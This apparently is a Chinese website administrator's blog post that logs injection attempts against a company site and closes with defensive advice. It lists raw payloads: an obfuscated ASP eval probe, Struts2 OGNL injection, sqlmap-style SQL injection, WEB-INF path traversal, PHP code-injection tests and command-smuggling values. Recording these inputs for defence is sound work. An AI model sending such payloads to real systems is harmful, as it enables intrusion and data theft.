网站注入代码记录
作为公司的网站管理员,一个字:累!网站经常因攻击被注入非法信息,防不胜防,特别是 ASP 网站程序,会遭到大量的扫描和代码注入。下面看看入侵者是用什么代码来注入你的网站的(以下均为日志中记录到的请求参数原文):
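发起注入请求的来源IP(日志记录)
注:其中 108.162.x、162.158.x、172.68.x、173.245.48.x 属于 Cloudflare 公布的边缘节点网段。站点如果接入了 CDN,日志里记下的就是代理节点,而不是攻击者的真实IP,直接封禁会误伤正常访客;应先从 CF-Connecting-IP 等请求头还原真实来源,再决定是否拦截。其余地址也应先确认是否为 CDN 或代理节点。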
108.162.215.122
162.158.58.97
172.68.132.45
172.68.141.104
172.68.141.20
172.68.142.171
172.68.47.172
173.245.48.139
172.68.132.45
172.68.141.104
172.68.141.20
172.68.141.236
172.68.142.171
172.68.47.172
173.245.48.139
173.245.48.97
180.97.106.163
180.97.106.164
180.97.106.39
180.97.106.163
180.97.106.164
180.97.106.39
000001
000001
000484
000712
000745
Execute ( Execute ( :Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(bd=bd&chr(&H&c&)):Else:Execute(bd=bd&chr(&H&c&Mid(s,i+2,2)&)):i=i+2:End If&chr(10)&Next:End Function:Response.Write(->|): Execute (On Error Resume Next:&bd(526573706F6E73652E5772697465282268616F72656E67652E636F6D51513331373237353733382229)):Response.Write(|<-):Response.End))
${#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}
${@print(md5(812812))}
${@print(md5(812812
%{#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}
%{(#test=*multipart/form-data*).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[*com.opensymphony.xwork2.ActionContext.container*]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType(*text/html
(#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)
(#context[xwork.MethodAccessor.denyMethodExecution]=new java.lang.Boolean(false),#_memberAccess[allowStaticMethodAccess]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)
(SELECT (CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (4624=4624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(106)||CHR(118)||CHR(113)))
(SELECT (CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (2130=2130) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(98)||CHR(113)))
(SELECT (CHR(113)||CHR(122)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8814=8814) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(120)||CHR(112)||CHR(113)))
(SELECT (CHR(113)||CHR(98)||CHR(113)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5282=5282) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(106)||CHR(113)))
(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4070=4070) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113))
(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9952=9952) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113))
(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8386=8386) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113))
(SELECT CHAR(113)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7434=7434) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(106)+CHAR(113))
(SELECT CONCAT(0x7162716271,(SELECT (ELT(7981=7981,1))),0x7176626a71))
(SELECT CONCAT(0x7170707671,(SELECT (ELT(3194=3194,1))),0x716a6a7671))
(SELECT CONCAT(0x71767a7871,(SELECT (ELT(6582=6582,1))),0x71707a6271))
(SELECT CONCAT(0x717a6b7071,(SELECT (ELT(5363=5363,1))),0x717a787071))
*
*]
*+(#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+*
*+(#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())2
*+(#context[xwork.MethodAccessor.denyMethodExecution]=new java.lang.Boolean(false),#_memberAccess[allowStaticMethodAccess]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+*
*+(#context[xwork.MethodAccessor.denyMethodExecution]=new java.lang.Boolean(false),#_memberAccess[allowStaticMethodAccess]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())2
../../WEB-INF/web.xm
../../WEB-INF/web.xml
../../WEB-INF/web
..\..\WEB-INF/web.xm
..\..\WEB-INF/web.xml
..\..\WEB-INF/web
/**/cOnVeRt(int,(char(33)+char(126)+char(33)+(char(65)+char(66)+char(67)+char(49)+char(52)+char(53)+char(90)+char(81)+char(54)+char(50)+char(68)+char(87)+char(81)+char(65)+char(70)+char(80)+char(79)+char(73)+char(89)+char(67)+char(70)+char(68))+char(33)+char(126)+char(33)))
/../../WEB-INF/web.xm
/../../WEB-INF/web.xml
/../../WEB-INF/web
/usr/bin/id
;${@print(md5(812812))};//
;${@print(md5(812812))
\..\..\WEB-INF\web.xm
\..\..\WEB-INF\web.xml
\..\..\WEB-INF\web
\\..\....\\....\\WEB-INF\web.xm
\\..\....\\....\\WEB-INF\web.xml
\\..\....\\....\\WEB-INF\web
\\..\\..\\WEB-INF\\web.xm
\\..\\..\\WEB-INF\\web.xml
\\..\\..\\WEB-INF\\web
];${@print(md5(812812))};//
];${@print(md5(812812))
=
0 ORDER BY 1#
0 ORDER BY 1#
0) ORDER BY 1#
0-(-8281*2)-8281-8281
0) ORDER BY 1#
1 ORDER BY 1#
1
1 ORDER BY 1#
1) ORDER BY 1#
1-(-8281*2)-8281-8281
1) ORDER BY 1#
1*
-1001
105 AnD BeNChMaRK(2999999,MD5(NOW()))
105&&BeNChMaRK(2999999,MD5(NOW()))
105&&SlEEp(3)
-1051
-1986
-1990
-1998
2 AnD BeNChMaRK(2999999,MD5(NOW()))
2 ORDER BY 1#
2 ORDER BY 1#
2) ORDER BY 1#
2&&BeNChMaRK(2999999,MD5(NOW()))
2&&SlEEp(3)
2-(-8281*2)-8281-8279
2-(-8281*2)-8281-8281
2) ORDER BY 1#
-2000
-2003) ORDER BY 1#
-2003
-2995
-2997
2and1=1
2AND1=1
2and1>1
3 ORDER BY 1#
3 ORDER BY 1#
3-(-8281*2)-8281-8281
3) ORDER BY 1#
-3000
-3918
392 AnD BeNChMaRK(2999999,MD5(NOW()))
392&&BeNChMaRK(2999999,MD5(NOW()))
392&&SlEEp(3)
-3921
-3994
-3998
4-(-8281*2)-8281-8281
-4001
-4003
-4102
-4104
-4111
-4112
-4113) ORDER BY 1#
-4119
-4127
-4128) ORDER BY 1#
-4553
-4557
-4558
456 AnD BeNChMaRK(2999999,MD5(NOW()))
456&&BeNChMaRK(2999999,MD5(NOW()))
456&&SlEEp(3)
-4568
-4569
-4573
-4599
460 AnD BeNChMaRK(2999999,MD5(NOW()))
460&&BeNChMaRK(2999999,MD5(NOW()))
460&&SlEEp(3)
-4604
461 AnD BeNChMaRK(2999999,MD5(NOW()))
461&&BeNChMaRK(2999999,MD5(NOW()))
461&&SlEEp(3)
-4610
-4611
-4624
-4628
463 AnD BeNChMaRK(2999999,MD5(NOW()))
463&&BeNChMaRK(2999999,MD5(NOW()))
463&&SlEEp(3)
-4633
-4669
467 AnD BeNChMaRK(2999999,MD5(NOW()))
467&&BeNChMaRK(2999999,MD5(NOW()))
467&&SlEEp(3)
-4676
-4677
467cp.asp?lx=big
-4689
-4696
-4774
-4777
478 AnD BeNChMaRK(2999999,MD5(NOW()))
478&&BeNChMaRK(2999999,MD5(NOW()))
478&&SlEEp(3)
-4789
479 AnD BeNChMaRK(2999999,MD5(NOW()))
479&&BeNChMaRK(2999999,MD5(NOW()))
479&&SlEEp(3)
-4797
-4799
-4832
-4835
484 AnD BeNChMaRK(2999999,MD5(NOW()))
484 AND SLEEP(5)-- xJzB
484 AND SLEEP(5)
484 ORDER BY 1-- FloG
484 ORDER BY 1-- rIqq
484 ORDER BY 1#
484&&BeNChMaRK(2999999,MD5(NOW()))
484&&SlEEp(3)
484-(-8281*2)-8281-8281
484)
484) ORDER BY 1-- PWWX
484) ORDER BY 1#
-4841
484cp.asp?lx=big
485?newsid=485
-4860
-4909
491 AnD BeNChMaRK(2999999,MD5(NOW()))
491&&BeNChMaRK(2999999,MD5(NOW()))
491&&SlEEp(3)
-4911
-4990
-4994
-4999
5-(-8281*2)-8281-8281
-5002
-5005
-5018
502?newsid=502
-5026
-5028
503-(-8281*2)-8281-8281
-5030
-5032
-5047
-5106
511 AnD BeNChMaRK(2999999,MD5(NOW()))
511&&BeNChMaRK(2999999,MD5(NOW()))
511&&SlEEp(3)
-5113
-5119
512 AnD BeNChMaRK(2999999,MD5(NOW()))
512&&BeNChMaRK(2999999,MD5(NOW()))
523?newsid=523
-5231
-5232
-5234
-5685) ORDER BY 1#
-5815
582 AnD BeNChMaRK(2999999,MD5(NOW()))
582&&BeNChMaRK(2999999,MD5(NOW()))
582&&SlEEp(3)
-5821
-5824
-5838
-5841
-5852
-5855
586 AnD BeNChMaRK(2999999,MD5(NOW()))
586&&BeNChMaRK(2999999,MD5(NOW()))
586&&SlEEp(3)
-5861
-5900
-5903
-5909
591 AnD BeNChMaRK(2999999,MD5(NOW()))
591&&BeNChMaRK(2999999,MD5(NOW()))
591&&SlEEp(3)
-5910
-5920
-5921
-5922
-5923
-5928
593?newsid=593
-5933
-5958
596?newsid=596
-5963
-5964
-5969
-5971) ORDER BY 1#
-5973
-5974
-5979
-5987
-5989
599 AnD BeNChMaRK(2999999,MD5(NOW()))
599&&BeNChMaRK(2999999,MD5(NOW()))
603 AnD BeNChMaRK(2999999,MD5(NOW()))
603&&BeNChMaRK(2999999,MD5(NOW()))
603&&SlEEp(3)
-6030
-6031
-6037
-6039
-6044
-6046
-6047
-6049
-6051
-6056
-6069
607?bookid=607
-6072
-6074
-6077
-6080
-6088
-6091
-6093
-6094
-6096) ORDER BY 1#
-6098
-6144
615 ORDER BY 1#
615-(-8281*2)-8281-8281
615) ORDER BY 1#
-6174
-6179
618-(-8281*2)-8281-8281
-6184
-6189
619 ORDER BY 1#
619 ORDER BY 1#
619) ORDER BY 1#
619-(-8281*2)-8281-8281
619) ORDER BY 1#
619?newsid=619
-6190
-6192
-6194
-6199
620?newsid=620
-6206
-6207
-6210
622?newsid=622
-6224
-6257
-6259
626 AnD BeNChMaRK(2999999,MD5(NOW()))
626&&BeNChMaRK(2999999,MD5(NOW()))
626&&SlEEp(3)
-6261
-6266) ORDER BY 1#
-6266
-6267
-9981
-9986
-9987
-9989
-9992
-9994
-9995
BchR1FPK
big ORDER BY 1#
big ORDER BY 1#
big) ORDER BY 1#
big&
big) ORDER BY 1#
command
data://text/plain
Execute ( Execute ( :Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(bd=bd&chr(&H&c&)):Else:Execute(bd=bd&chr(&H&c&Mid(s,i+2,2)&)):i=i+2:End If&chr(10)&Next:End Function:Response.Write(->|): Execute (On Error Resume Next:&bd(526573706F6E73652E5772697465282268616F72656E67652E636F6D51513331373237353733382229)):Response.Write(|<-):Response.End))
set
string:{var_dump(md5(81281
string:{var_dump(md5(812812))}
UTF-8
WEB-INF/
WEB-INF/web.xm
WEB-INF/web.xml
WEB-INF/web
WEB-INF\web.xm
WEB-INF\web.xml
WEB-INF\web
x||set||x
总之,特殊字符用得最多!不过上面也有不少只含数字和字母的探测(如 2and1=1、-4001),单靠过滤特殊字符是挡不住的:数字型参数应先做类型校验,数据库访问应使用参数化查询,文件路径参数应限定在固定目录内。